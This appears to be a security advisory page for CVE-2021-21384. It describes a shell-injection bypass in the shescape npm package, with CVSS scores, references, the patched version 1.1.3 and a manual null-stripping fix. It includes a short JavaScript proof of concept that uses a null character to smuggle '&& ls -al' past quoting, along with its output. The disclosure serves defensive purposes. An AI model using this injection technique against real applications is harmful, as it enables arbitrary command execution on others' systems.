CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
34.7%
Anyone using Shescape to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a null character into the payload. For example (on Windows):
const cp = require("child_process");
const shescape = require("shescape");
const nullChar = String.fromCharCode(0);
const payload = "foo\" && ls -al ${nullChar} && echo \"bar";
console.log(cp.execSync(`echo ${shescape.quote(payload)}`));
// foototal 3
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 .
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 ..
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder
// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file
The problem has been patched in v1.1.3 which you can upgrade to now. No further changes are required.
Alternatively, null characters can be stripped out manually using e.g. arg.replace(/\u{0}/gu, "")
Vendor | Product | Version | CPE |
---|---|---|---|
shescape_project | shescape | * | cpe:2.3:a:shescape_project:shescape:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-f2rp-38vg-j3gh
github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b
github.com/ericcornelissen/shescape/releases/tag/v1.1.3
github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh
nvd.nist.gov/vuln/detail/CVE-2021-21384
www.npmjs.com/package/shescape
CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
34.7%